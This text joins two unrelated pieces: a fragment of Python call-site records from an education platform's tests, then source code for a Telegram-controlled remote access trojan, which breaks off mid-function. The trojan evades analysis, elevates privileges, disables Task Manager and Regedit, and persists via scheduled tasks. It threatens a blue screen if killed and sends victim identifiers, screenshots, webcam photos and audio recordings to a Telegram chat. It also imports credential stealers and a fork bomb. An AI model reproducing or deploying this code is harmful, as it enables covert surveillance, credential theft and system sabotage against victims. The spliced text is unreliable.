'None', 'None', '"""more text"""'], {}), "(thread_id, self.user_c_id, None, None,\n 'more text')\n", (20280, 20336), False, 'from core.domain import feedback_services\n'), ((21357, 21475), 'core.domain.rights_manager.assign_role_for_exploration', 'rights_manager.assign_role_for_exploration', (['self.user_a', 'self.EXP_ID_1', 'self.user_b_id', 'rights_domain.ROLE_EDITOR'], {}), '(self.user_a, self.EXP_ID_1, self\n .user_b_id, rights_domain.ROLE_EDITOR)\n', (21399, 21475), False, 'from core.domain import rights_manager\n'), ((21581, 21699), 'core.domain.rights_manager.assign_role_for_exploration', 'rights_manager.assign_role_for_exploration', (['self.user_a', 'self.EXP_ID_1', 'self.user_c_id', 'rights_domain.ROLE_VIEWER'], {}), '(self.user_a, self.EXP_ID_1, self\n .user_c_id, rights_domain.ROLE_VIEWER)\n', (21623, 21699), False, 'from core.domain import rights_manager\n'), ((23499, 23617), 'core.domain.rights_manager.assign_role_for_exploration', 'rights_manager.assign_role_for_exploration', (['self.user_a', 'self.EXP_ID_1', 'self.user_b_id', 'rights_domain.ROLE_EDITOR'], {}), '(self.user_a, self.EXP_ID_1, self\n .user_b_id, rights_domain.ROLE_EDITOR)\n', (23541, 23617), False, 'from core.domain import rights_manager\n'), ((23713, 23775), 'core.domain.rights_manager.publish_exploration', 'rights_manager.publish_exploration', (['self.user_a', 'self.EXP_ID_1'], {}), '(self.user_a, self.EXP_ID_1)\n', (23747, 23775), False, 'from core.domain import rights_manager\n'), ((23788, 23863), 'core.domain.rights_manager.release_ownership_of_exploration', 'rights_manager.release_ownership_of_exploration', (['self.user_a', 'self.EXP_ID_1'], {}), '(self.user_a, self.EXP_ID_1)\n', (23835, 23863), False, 'from core.domain import rights_manager\n'), ((23937, 24029), 'core.domain.exp_services.update_exploration', 'exp_services.update_exploration', (['self.user_c_id', 'self.EXP_ID_1', '[]', '"""Update exploration"""'], {}), "(self.user_c_id, self.EXP_ID_1, [],\n 'Update exploration')\n", (23968, 24029), False, 'from core.domain import exp_services\n'), ((25060, 25122), 'core.domain.exp_services.delete_exploration', 'exp_services.delete_exploration', (['self.user_a_id', 'self.EXP_ID_1'], {}), '(self.user_a_id, self.EXP_ID_1)\n', (25091, 25122), False, 'from core.domain import exp_services\n'), ((26120, 26243), 'core.domain.rights_manager.assign_role_for_collection', 'rights_manager.assign_role_for_collection', (['self.user_a', 'self.COLLECTION_ID_1', 'self.user_b_id', 'rights_domain.ROLE_EDITOR'], {}), '(self.user_a, self.COLLECTION_ID_1,\n self.user_b_id, rights_domain.ROLE_EDITOR)\n', (26161, 26243), False, 'from core.domain import rights_manager\n'), ((26349, 26472), 'core.domain.rights_manager.assign_role_for_collection', 'rights_manager.assign_role_for_collection', (['self.user_a', 'self.COLLECTION_ID_1', 'self.user_c_id', 'rights_domain.ROLE_VIEWER'], {}), '(self.user_a, self.COLLECTION_ID_1,\n self.user_c_id, rights_domain.ROLE_VIEWER)\n', (26390, 26472), False, 'from core.domain import rights_manager\n'), ((29209, 29284), 'core.domain.collection_services.delete_collection', 'collection_services.delete_collection', (['self.user_a_id', 'self.COLLECTION_ID_1'], {}), '(self.user_a_id, self.COLLECTION_ID_1)\n', (29246, 29284), False, 'from core.domain import collection_services\n'), ((29374, 29436), 'core.domain.exp_services.delete_exploration', 'exp_services.delete_exploration', (['self.user_a_id', 'self.EXP_ID_1'], {}), '(self.user_a_id, self.EXP_ID_1)\n', (29405, 29436), False, 'from core.domain import exp_services\n'), ((30284, 30492), 'core.domain.collection_services.update_collection', 'collection_services.update_collection', (['self.user_b_id', 'self.COLLECTION_ID_1', "[{'cmd': collection_domain.CMD_ADD_COLLECTION_NODE, 'exploration_id': self.\n EXP_ID_1}]", '"""Add new exploration to collection."""'], {}), "(self.user_b_id, self.COLLECTION_ID_1,\n [{'cmd': collection_domain.CMD_ADD_COLLECTION_NODE, 'exploration_id':\n self.EXP_ID_1}], 'Add new exploration to collection.')\n", (30321, 30492), False, 'from core.domain import collection_services\n'), ((32008, 32070), 'core.domain.rights_manager.publish_exploration', 'rights_manager.publish_exploration', (['self.user_a', 'self.EXP_ID_1'], {}), '(self.user_a, self.EXP_ID_1)\n', (32042, 32070), False, 'from core.domain import rights_manager\n'), ((32357, 32480), 'core.domain.rights_manager.assign_role_for_collection', 'rights_manager.assign_role_for_collection', (['self.user_a', 'self.COLLECTION_ID_1', 'self.user_b_id', 'rights_domain.ROLE_EDITOR'], {}), '(self.user_a, self.COLLECTION_ID_1,\n self.user_b_id, rights_domain.ROLE_EDITOR)\n', (32398, 32480), False, 'from core.domain import rights_manager\n'), ((32577, 32645), 'core.domain.rights_manager.publish_collection', 'rights_manager.publish_collection', (['self.user_a', 'self.COLLECTION_ID_1'], {}), '(self.user_a, self.COLLECTION_ID_1)\n', (32610, 32645), False, 'from core.domain import rights_manager\n'), ((32658, 32744), 'core.domain.rights_manager.release_ownership_of_collection', 'rights_manager.release_ownership_of_collection', (['self.user_a', 'self.COLLECTION_ID_1'], {}), '(self.user_a, self.\n COLLECTION_ID_1)\n', (32704, 32744), False, 'from core.domain import rights_manager\n'), ((32813, 33065), 'core.domain.collection_services.update_collection', 'collection_services.update_collection', (['self.user_c_id', 'self.COLLECTION_ID_1', "[{'cmd': collection_domain.CMD_EDIT_COLLECTION_PROPERTY, 'property_name':\n collection_domain.COLLECTION_PROPERTY_TITLE, 'new_value': 'New title'}]", '"""Changed title."""'], {}), "(self.user_c_id, self.COLLECTION_ID_1,\n [{'cmd': collection_domain.CMD_EDIT_COLLECTION_PROPERTY,\n 'property_name': collection_domain.COLLECTION_PROPERTY_TITLE,\n 'new_value': 'New title'}], 'Changed title.')\n", (32850, 33065), False, 'from core.domain import collection_services\n'), ((37114, 37172), 'core.domain.user_services.get_last_week_dashboard_stats', 'user_services.get_last_week_dashboard_stats', (['self.owner_id'], {}), '(self.owner_id)\n', (37157, 37172), False, 'from core.domain import user_services\n'), ((37763, 37821), 'core.domain.user_services.get_last_week_dashboard_stats', 'user_services.get_last_week_dashboard_stats', (['self.owner_id'], {}), '(self.owner_id)\n', (37806, 37821), False, 'from core.domain import user_services\n'), ((43892, 43950), 'core.domain.user_services.get_last_week_dashboard_stats', 'user_services.get_last_week_dashboard_stats', (['self.owner_id'], {}), '(self.owner_id)\n', (43935, 43950), False, 'from core.domain import user_services\n'), ((55395, 55508), 'core.domain.exp_domain.Exploration.create_default_exploration', 'exp_domain.Exploration.create_default_exploration', (["('%s' % i)"], {'title': "('title %d' % i)", 'category': "('category%d' % i)"}), "('%s' % i, title=\n 'title %d' % i, category='category%d' % i)\n", (55444, 55508), False, 'from core.domain import exp_domain\n'), ((55628, 55681), 'core.domain.exp_services.save_new_exploration', 'exp_services.save_new_exploration', (['self.owner_id', 'exp'], {}), '(self.owner_id, exp)\n', (55661, 55681), False, 'from core.domain import exp_services\n'), ((55694, 55748), 'core.domain.rights_manager.publish_exploration', 'rights_manager.publish_exploration', (['self.owner', 'exp.id'], {}), '(self.owner, exp.id)\n', (55728, 55748), False, 'from core.domain import rights_manager\n'), ((55795, 55863), 'core.domain.subscription_services.subscribe_to_exploration', 'subscription_services.subscribe_to_exploration', (['self.user_id', 'exp.id'], {}), '(self.user_id, exp.id)\n', (55841, 55863), False, 'from core.domain import subscription_services\n'), ((59077, 59111), 'ast.literal_eval', 'ast.literal_eval', (['stringified_item'], {}), '(stringified_item)\n', (59093, 59111), False, 'import ast\n'), ((64770, 64804), 'ast.literal_eval', 'ast.literal_eval', (['stringified_item'], {}), '(stringified_item)\n', (64786, 64804), False, 'import ast\n'), ((68859, 68893), 'ast.literal_eval', 'ast.literal_eval', (['stringified_item'], {}), '(stringified_item)\n', (68875, 68893), False, 'import ast\n'), ((69761, 69788), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(2)'}), '(hours=2)\n', (69779, 69788), False, 'import datetime\n'), ((69952, 69979), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(10)'}), '(days=10)\n', (69970, 69979), False, 'import datetime\n'), ((70069, 70098), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(1)'}), '(minutes=1)\n', (70087, 70098), False, 'import datetime\n'), ((70208, 70237), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(3)'}), '(minutes=3)\n', (70226, 70237), False, 'import datetime\n'), ((70325, 70353), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(12)'}), '(hours=12)\n', (70343, 70353), False, 'import datetime\n'), ((70468, 70496), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(14)'}), '(hours=14)\n', (70486, 70496), False, 'import datetime\n'), ((70598, 70626), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(15)'}), '(hours=15)\n', (70616, 70626), False, 'import datetime\n'), ((70729, 70757), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(16)'}), '(hours=16)\n', (70747, 70757), False, 'import datetime\n'), ((72218, 72245), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(2)'}), '(hours=2)\n', (72236, 72245), False, 'import datetime\n'), ((72347, 72374), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(3)'}), '(hours=3)\n', (72365, 72374), False, 'import datetime\n'), ((72727, 72755), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(10)'}), '(hours=10)\n', (72745, 72755), False, 'import datetime\n'), ((72852, 72880), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(10)'}), '(hours=10)\n', (72870, 72880), False, 'import datetime\n'), ((73652, 73679), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(5)'}), '(hours=5)\n', (73670, 73679), False, 'import datetime\n'), ((73784, 73811), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(5)'}), '(hours=5)\n', (73802, 73811), False, 'import datetime\n'), ((74111, 74138), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(5)'}), '(hours=5)\n', (74129, 74138), False, 'import datetime\n'), ((74450, 74477), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(6)'}), '(hours=6)\n', (74468, 74477), False, 'import datetime\n'), ((74744, 74772), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(10)'}), '(hours=10)\n', (74762, 74772), False, 'import datetime\n'), ((74866, 74894), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(10)'}), '(hours=10)\n', (74884, 74894), False, 'import datetime\n'), ((77755, 77782), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(5)'}), '(hours=5)\n', (77773, 77782), False, 'import datetime\n'), ((77877, 77904), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(6)'}), '(hours=6)\n', (77895, 77904), False, 'import datetime\n'), ((78001, 78028), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(1)'}), '(hours=1)\n', (78019, 78028), False, 'import datetime\n'), ((81830, 81857), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(2)'}), '(hours=2)\n', (81848, 81857), False, 'import datetime\n'), ((81947, 81976), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(1)'}), '(minutes=1)\n', (81965, 81976), False, 'import datetime\n'), ((82086, 82115), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(3)'}), '(minutes=3)\n', (82104, 82115), False, 'import datetime\n'), ((82230, 82258), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(14)'}), '(hours=14)\n', (82248, 82258), False, 'import datetime\n'), ((82360, 82388), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(15)'}), '(hours=15)\n', (82378, 82388), False, 'import datetime\n'), ((82491, 82519), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(16)'}), '(hours=16)\n', (82509, 82519), False, 'import datetime\n'), ((83033, 83060), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(1)'}), '(hours=1)\n', (83051, 83060), False, 'import datetime\n'), ((85020, 85054), 'ast.literal_eval', 'ast.literal_eval', (['stringified_item'], {}), '(stringified_item)\n', (85036, 85054), False, 'import ast\n'), ((90885, 90998), 'core.domain.exp_domain.Exploration.create_default_exploration', 'exp_domain.Exploration.create_default_exploration', (["('%s' % i)"], {'title': "('title %d' % i)", 'category': "('category%d' % i)"}), "('%s' % i, title=\n 'title %d' % i, category='category%d' % i)\n", (90934, 90998), False, 'from core.domain import exp_domain\n'), ((91215, 91268), 'core.domain.exp_services.save_new_exploration', 'exp_services.save_new_exploration', (['self.owner_id', 'exp'], {}), '(self.owner_id, exp)\n', (91248, 91268), False, 'from core.domain import exp_services\n'), ((91281, 91335), 'core.domain.rights_manager.publish_exploration', 'rights_manager.publish_exploration', (['self.owner', 'exp.id'], {}), '(self.owner, exp.id)\n', (91315, 91335), False, 'from core.domain import rights_manager\n'), ((105927, 105961), 'ast.literal_eval', 'ast.literal_eval', (['stringified_item'], {}), '(stringified_item)\n', (105943, 105961), False, 'import ast\n'), ((111514, 111548), 'ast.literal_eval', 'ast.literal_eval', (['stringified_item'], {}), '(stringified_item)\n', (111530, 111548), False, 'import ast\n'), ((116436, 116465), 'datetime.datetime', 'datetime.datetime', (['(2021)', '(1)', '(1)'], {}), '(2021, 1, 1)\n', (116453, 116465), False, 'import datetime\n'), ((116717, 116746), 'datetime.datetime', 'datetime.datetime', (['(2021)', '(1)', '(1)'], {}), '(2021, 1, 1)\n', (116734, 116746), False, 'import datetime\n'), ((117770, 117799), 'datetime.datetime', 'datetime.datetime', (['(2017)', '(1)', '(1)'], {}), '(2017, 1, 1)\n', (117787, 117799), False, 'import datetime\n'), ((3926, 4056), 'core.domain.exp_domain.ExplorationChange', 'exp_domain.ExplorationChange', (["{'cmd': 'edit_exploration_property', 'property_name': 'objective',\n 'new_value': 'the objective'}"], {}), "({'cmd': 'edit_exploration_property',\n 'property_name': 'objective', 'new_value': 'the objective'})\n", (3954, 4056), False, 'from core.domain import exp_domain\n'), ((4323, 4453), 'core.domain.exp_domain.ExplorationChange', 'exp_domain.ExplorationChange', (["{'cmd': 'edit_exploration_property', 'property_name': 'objective',\n 'new_value': 'the objective'}"], {}), "({'cmd': 'edit_exploration_property',\n 'property_name': 'objective', 'new_value': 'the objective'})\n", (4351, 4453), False, 'from core.domain import exp_domain\n'), ((34705, 34731), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (34729, 34731), False, 'import datetime\n'), ((34734, 34755), 'datetime.timedelta', 'datetime.timedelta', (['(7)'], {}), '(7)\n', (34752, 34755), False, 'import datetime\n'), ((45333, 45379), 'core.domain.user_services.get_user_settings', 'user_services.get_user_settings', (['self.admin_id'], {}), '(self.admin_id)\n', (45364, 45379), False, 'from core.domain import user_services\n'), ((45805, 45970), 'core.domain.exp_domain.ExplorationChange', 'exp_domain.ExplorationChange', (["{'cmd': 'edit_state_property', 'state_name': init_state_name,\n 'property_name': 'widget_id', 'new_value': 'MultipleChoiceInput'}"], {}), "({'cmd': 'edit_state_property', 'state_name':\n init_state_name, 'property_name': 'widget_id', 'new_value':\n 'MultipleChoiceInput'})\n", (45833, 45970), False, 'from core.domain import exp_domain\n'), ((46042, 46341), 'core.domain.exp_domain.ExplorationChange', 'exp_domain.ExplorationChange', (["{'cmd': 'edit_state_property', 'state_name': init_state_name,\n 'property_name': 'widget_customization_args', 'new_value': {'choices':\n {'value': [{'content_id': 'ca_choices_0', 'html': '<p>Choice 1</p>'}]},\n 'showChoicesInShuffledOrder': {'value': True}}}"], {}), "({'cmd': 'edit_state_property', 'state_name':\n init_state_name, 'property_name': 'widget_customization_args',\n 'new_value': {'choices': {'value': [{'content_id': 'ca_choices_0',\n 'html': '<p>Choice 1</p>'}]}, 'showChoicesInShuffledOrder': {'value': \n True}}})\n", (46070, 46341), False, 'from core.domain import exp_domain\n'), ((46862, 46908), 'core.domain.user_services.get_user_settings', 'user_services.get_user_settings', (['self.admin_id'], {}), '(self.admin_id)\n', (46893, 46908), False, 'from core.domain import user_services\n'), ((46976, 47023), 'core.domain.user_services.get_user_settings', 'user_services.get_user_settings', (['self.editor_id'], {}), '(self.editor_id)\n', (47007, 47023), False, 'from core.domain import user_services\n'), ((48204, 48250), 'core.domain.user_services.get_user_settings', 'user_services.get_user_settings', (['self.owner_id'], {}), '(self.owner_id)\n', (48235, 48250), False, 'from core.domain import user_services\n'), ((48613, 48659), 'core.domain.user_services.get_user_settings', 'user_services.get_user_settings', (['self.owner_id'], {}), '(self.owner_id)\n', (48644, 48659), False, 'from core.domain import user_services\n'), ((48958, 49004), 'core.domain.user_services.get_user_settings', 'user_services.get_user_settings', (['self.owner_id'], {}), '(self.owner_id)\n', (48989, 49004), False, 'from core.domain import user_services\n'), ((51146, 51276), 'core.domain.exp_domain.ExplorationChange', 'exp_domain.ExplorationChange', (["{'cmd': 'edit_exploration_property', 'property_name': 'objective',\n 'new_value': 'the objective'}"], {}), "({'cmd': 'edit_exploration_property',\n 'property_name': 'objective', 'new_value': 'the objective'})\n", (51174, 51276), False, 'from core.domain import exp_domain\n'), ((52300, 52430), 'core.domain.exp_domain.ExplorationChange', 'exp_domain.ExplorationChange', (["{'cmd': 'edit_exploration_property', 'property_name': 'objective',\n 'new_value': 'the objective'}"], {}), "({'cmd': 'edit_exploration_property',\n 'property_name': 'objective', 'new_value': 'the objective'})\n", (52328, 52430), False, 'from core.domain import exp_domain\n'), ((52647, 52777), 'core.domain.exp_domain.ExplorationChange', 'exp_domain.ExplorationChange', (["{'cmd': 'edit_exploration_property', 'property_name': 'objective',\n 'new_value': 'new objective'}"], {}), "({'cmd': 'edit_exploration_property',\n 'property_name': 'objective', 'new_value': 'new objective'})\n", (52675, 52777), False, 'from core.domain import exp_domain\n'), ((55559, 55580), 'python_utils.RANGE', 'python_utils.RANGE', (['(3)'], {}), '(3)\n', (55577, 55580), False, 'import python_utils\n'), ((70901, 70929), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(10)'}), '(hours=10)\n', (70919, 70929), False, 'import datetime\n'), ((82663, 82691), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(10)'}), '(hours=10)\n', (82681, 82691), False, 'import datetime\n'), ((86676, 86705), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (86694, 86705), False, 'import datetime\n'), ((91049, 91070), 'python_utils.RANGE', 'python_utils.RANGE', (['(3)'], {}), '(3)\n', (91067, 91070), False, 'import python_utils\n'), ((99275, 99405), 'core.domain.exp_domain.ExplorationChange', 'exp_domain.ExplorationChange', (["{'cmd': 'edit_exploration_property', 'property_name': 'objective',\n 'new_value': 'the objective'}"], {}), "({'cmd': 'edit_exploration_property',\n 'property_name': 'objective', 'new_value': 'the objective'})\n", (99303, 99405), False, 'from core.domain import exp_domain\n'), ((20142, 20212), 'core.domain.feedback_services.get_all_threads', 'feedback_services.get_all_threads', (['"""exploration"""', 'self.EXP_ID_1', '(False)'], {}), "('exploration', self.EXP_ID_1, False)\n", (20175, 20212), False, 'from core.domain import feedback_services\n'), ((73214, 73241), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(1)'}), '(hours=1)\n', (73232, 73241), False, 'import datetime\n'), ((73384, 73411), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(2)'}), '(hours=2)\n', (73402, 73411), False, 'import datetime\n'), ((83404, 83431), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(1)'}), '(hours=1)\n', (83422, 83431), False, 'import datetime\n'), ((83569, 83596), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(2)'}), '(hours=2)\n', (83587, 83596), False, 'import datetime\n'), ((115921, 115950), 'datetime.datetime', 'datetime.datetime', (['(2018)', '(1)', '(1)'], {}), '(2018, 1, 1)\n', (115938, 115950), False, 'import datetime\n'), ((113344, 113365), 'python_utils.RANGE', 'python_utils.RANGE', (['(4)'], {}), '(4)\n', (113362, 113365), False, 'import python_utils\n')] |
import sys,platform
import telebot
import requests
from getmac import get_mac_address as gma
from RAT import *
from Core.Settings.Organization import *
from Core.Settings.Antivirus import *
from Core.Settings.Admin import *
from Core.Settings.CriticalProcess import *
from Core.Settings.MessageBox import *
from Core.Network.Information import *
from Core.Network.Location import *
from Core.Main.Screen import *
from Core.Main.Webcam import *
from Core.Main.Audio import *
from Core.Main.Power import *
from Core.Main.Autorun import *
from Core.Files.Tasklist import *
from Core.Files.Taskkill import *
from Core.Fun.Message import *
from Core.Fun.Speak import *
from Core.Fun.OpenURL import *
from Core.Fun.Wallpapers import *
from Core.Fun.ForkBomb import *
from Core.Stealer.Discord import *
from Core.Stealer.Stealer import *
from Core.Stealer.Telegram import *
from Core.Other.Clipboard import *
from Core.Other.Monitor import *
from Core.Other.Rotate import *
from Core.Other.Freeze import *
from telebot import types
from telebot import util
bot = telebot.TeleBot(TelegramToken, threaded=True)
bot.worker_pool = util.ThreadPool(num_threads=50)
menu = types.ReplyKeyboardMarkup()
button1 = types.KeyboardButton('/1\n<<')
button2 = types.KeyboardButton('/2\n>>')
button3 = types.KeyboardButton('/Screen\n🖼')
button4 = types.KeyboardButton('/Webcam\n📸')
button5 = types.KeyboardButton('/Audio\n🎙')
button6 = types.KeyboardButton('/Power\n🔴')
button7 = types.KeyboardButton('/Autorun\n🔵')
menu.row(button1, button3, button2)
menu.row(button4, button5)
menu.row(button6, button7)
main2 = types.InlineKeyboardMarkup()
button1 = types.InlineKeyboardButton('Hibernate - 🛑', callback_data='hibernate')
button2 = types.InlineKeyboardButton('Shutdown - ⛔️', callback_data='shutdown')
button3 = types.InlineKeyboardButton('Restart - ⭕️', callback_data='restart')
button4 = types.InlineKeyboardButton('Logoff - 💢', callback_data='logoff')
button5 = types.InlineKeyboardButton('BSoD - 🌀', callback_data='bsod')
button6 = types.InlineKeyboardButton('« Back', callback_data='cancel')
main2.row(button1)
main2.row(button2)
main2.row(button3)
main2.row(button4)
main2.row(button5)
main2.row(button6)
main3 = types.InlineKeyboardMarkup()
button1 = types.InlineKeyboardButton('Add to Startup - 📥', callback_data='startup')
button2 = types.InlineKeyboardButton('Uninstall - ♻️', callback_data='confirm')
button3 = types.InlineKeyboardButton('« Back', callback_data='cancel')
main3.row(button1)
main3.row(button2)
main3.row(button3)
main4 = types.InlineKeyboardMarkup()
button1 = types.InlineKeyboardButton('Yes, im sure!', callback_data='uninstall')
button2 = types.InlineKeyboardButton('Hell no!', callback_data='cancel')
button3 = types.InlineKeyboardButton('« Back', callback_data='cancel')
main4.row(button1)
main4.row(button2)
main4.row(button3)
main5 = types.ReplyKeyboardMarkup()
button1 = types.KeyboardButton('/3\n<<')
button2 = types.KeyboardButton('/4\n>>')
button3 = types.KeyboardButton('/Screen\n🖼')
button4 = types.KeyboardButton('/Files\n💾')
button5 = types.KeyboardButton('/Tasklist\n📋')
button6 = types.KeyboardButton('/Taskkill\n📝')
main5.row(button1, button3, button2)
main5.row(button4)
main5.row(button5, button6)
main6 = types.InlineKeyboardMarkup()
button1 = types.InlineKeyboardButton('Kill all Processes', callback_data='taskkill all')
button2 = types.InlineKeyboardButton('Disable Task Manager', callback_data='disabletaskmgr')
main6.row(button1)
main6.row(button2)
main7 = types.ReplyKeyboardMarkup()
button1 = types.KeyboardButton('/CD\n🗂')
button2 = types.KeyboardButton('/Upload\n📡')
button3 = types.KeyboardButton('/ls\n📄')
button4 = types.KeyboardButton('/Remove\n🗑')
button5 = types.KeyboardButton('/Download\n📨')
button6 = types.KeyboardButton('/Run\n📌')
button7 = types.KeyboardButton('/Cancel')
main7.row(button1, button2, button3)
main7.row(button4, button5, button6)
main7.row(button7)
main8 = types.ReplyKeyboardMarkup()
button1 = types.KeyboardButton('/5\n<<')
button2 = types.KeyboardButton('/6\n>>')
button3 = types.KeyboardButton('/Screen\n🖼')
button4 = types.KeyboardButton('/Message\n💬')
button5 = types.KeyboardButton('/Speak\n📢')
button6 = types.KeyboardButton('/OpenURL\n🌐')
button7 = types.KeyboardButton('/Wallpapers\n🧩')
button8 = types.KeyboardButton('/ForkBomb\n⏱')
main8.row(button1, button3, button2)
main8.row(button4, button5)
main8.row(button6, button7, button8)
# Variables
Expansion = os.path.splitext(os.path.basename(sys.argv[0]))[1]
CurrentName = os.path.basename(sys.argv[0])
CurrentPath = sys.argv[0]
ProcessName = ProcessName + Expansion
# Create a folder to save temporary files
if not os.path.exists(Directory):
os.makedirs(Directory)
os.makedirs(Directory + 'Documents')
os.makedirs(Directory + 'Photos')
# Checks if the script is running computer of the anti-virus organization
if Organization() is True:
sys.exit()
# Run as Administrator
if AdminRightsRequired is True:
if Admin() is False:
while True:
try:
print('[~] › Trying elevate previleges to administrator\n')
os.startfile(CurrentPath, 'runas')
except:
pass
else:
print('[+] › ' + CurrentName + ' opened as admin rights\n')
break
# Checks if the file is running as an administrator
if AdminRightsRequired is True:
if Admin() is False:
sys.exit()
# Disables TaskManager
if DisableTaskManager is True:
try:
if os.path.exists(Directory + 'RegeditDisableTaskManager'):
print('[+] › Task Manager is already disabled\n')
else:
if Admin() is False:
print('[-] › This function requires admin rights\n')
if Admin() is True:
RegeditDisableTaskManager()
open(Directory + 'RegeditDisableTaskManager', 'a').close()
print('[+] › Task Manager is was disabled\n')
except:
pass
# Disables Regedit
if DisableRegistryTools is True:
try:
if os.path.exists(Directory + 'RegeditDisableRegistryTools'):
print('[+] › Regedit is already disabled\n')
else:
if Admin() is False:
print('[-] › This function requires admin rights\n')
if Admin() is True:
RegeditDisableRegistryTools()
open(Directory + 'RegeditDisableRegistryTools', 'a').close()
print('[+] › Regedit is was disabled\n')
except:
pass
# Adds a program to startup
if AutorunEnabled is True:
try:
if SchtasksExists(AutorunName) and InstallPathExists(InstallPath, ProcessName) is True:
print('[+] › '+ CurrentName +' ‹ is already in startup › ' + InstallPath + '\\' + ProcessName + '\n')
else:
if Admin() is False:
print('[-] › This function requires admin rights!\n')
if Admin() is True:
AddToAutorun(AutorunName, InstallPath, ProcessName)
if not os.path.exists(InstallPath + '\\' + ProcessName):
CopyToAutorun(CurrentPath, InstallPath, ProcessName)
print('[+] › ' + CurrentName+' ‹ copied to startup › ' + InstallPath + '\\' + ProcessName + '\n')
except:
pass
# Displays a message on the screen.
if DisplayMessageBox is True:
try:
if os.path.exists(Directory + 'DisplayMessageBox'):
pass
else:
open(Directory + 'DisplayMessageBox', 'a').close()
MessageBox(Message)
except:
pass
# Protect process with BSoD (if killed).
if ProcessBSODProtectionEnabled is True:
if Admin() is False:
print('[-] › This function requires admin rights\n')
if Admin() is True:
SetProtection()
print('[+] › Process protection is was activated\n')
# Adds argument none_stop if process protection is enabled
if ProcessBSODProtectionEnabled is True:
Argument = none_stop = True
else:
Argument = ''
# Sends an online message
while True:
try:
if Admin() is True:
Online = '🔘 Online!'
if Admin() is False:
Online = '🟢 Online!'
bot.send_message(TelegramChatID,
'\n*' + Online + '\n'
'\nPC » ' + ComputerName + '_' + gma() + '_' + os.getlogin() +
'\nOS » ' + Windows() +
'\n'
'\nAV » ' + Antivirus[0] +
'\n'
'\nIP » ' + Geolocation('query') + '*',
parse_mode='Markdown')
except Exception as e:
print('[-] › Retrying connect to api.telegram.org\n')
print(e)
else:
print('[+] › Connected to api.telegram.org\n')
break
# Takes a screenshot
@bot.message_handler(regexp='/Screen')
def Screen(command):
try:
bot.send_chat_action(command.chat.id, 'upload_photo')
File = Directory + 'Screenshot.jpg'
Screenshot(File)
Screen = open(File, 'rb')
bot.send_photo(command.chat.id, Screen)
except:
pass
# Takes a photo from a webcam
@bot.message_handler(regexp='/Webcam')
def Webcam(command):
try:
bot.send_chat_action(command.chat.id, 'upload_photo')
File = Directory + 'Webcam.jpg'
if os.path.exists(File):
os.remove(File)
WebcamScreenshot(File)
Webcam = open(File, 'rb')
bot.send_photo(command.chat.id, Webcam)
except:
bot.reply_to(command, '_Webcam not found!_', parse_mode='Markdown')
# Records microphone sound
@bot.message_handler(regexp='/Audio')
def Audio(command):
try:
Seconds = re.split('/Audio ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Recording..._', parse_mode='Markdown')
try:
File = Directory + 'Audio.wav'
Microphone(File, Seconds)
Audio = open(File, 'rb')
bot.send_voice(command.chat.id, Audio)
except ValueError:
bot.reply_to(command, '_Specify the recording time in seconds!_', parse_mode='Markdown')
except:
bot.reply_to(command, '_Microphone not found!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Specify the recording duration_\n\n*› /Audio*', parse_mode='Markdown')
# Sends a message
def SendMessage(call, text):
bot.edit_message_text(chat_id=call.message.chat.id,
message_id=call.message.message_id, text=text, parse_mode='Markdown')
# Power and startup management
@bot.callback_query_handler(func=lambda call: True)
def callback_inline(command):
if command.message:
# Hibernate button
if command.data == 'hibernate':
try:
SendMessage(command, '*Hibernate* _command received!_')
UnsetProtection()
Hibernate()
except:
pass
# Shutdown button
if command.data == 'shutdown':
try:
SendMessage(command, '*Shutdown* _command received!_')
UnsetProtection()
Shutdown()
except:
pass
# Reboot button
if command.data == 'restart':
try:
SendMessage(command, '*Restart* _command received!_')
UnsetProtection()
Restart()
except:
pass
# Button that ends a user session
if command.data == 'logoff':
try:
SendMessage(command, '*Logoff* _command received!_')
UnsetProtection()
Logoff()
except:
pass
# Button killing system with blue screen of death
if command.data == 'bsod':
try:
SendMessage(command, '*Blue Screen of Death* _is was activated!_')
UnsetProtection()
BSoD()
except:
pass
# Button processing which adds a trojan to startup (schtasks)
if command.data == 'startup':
try:
if SchtasksExists(AutorunName) and InstallPathExists(InstallPath, ProcessName) is True:
SendMessage(command, '*' + ProcessName + '* _is already in startup!_')
else:
if Admin() is False:
SendMessage(command, '_This function requires admin rights!_')
if Admin() is True:
AddToAutorun(AutorunName, InstallPath, ProcessName)
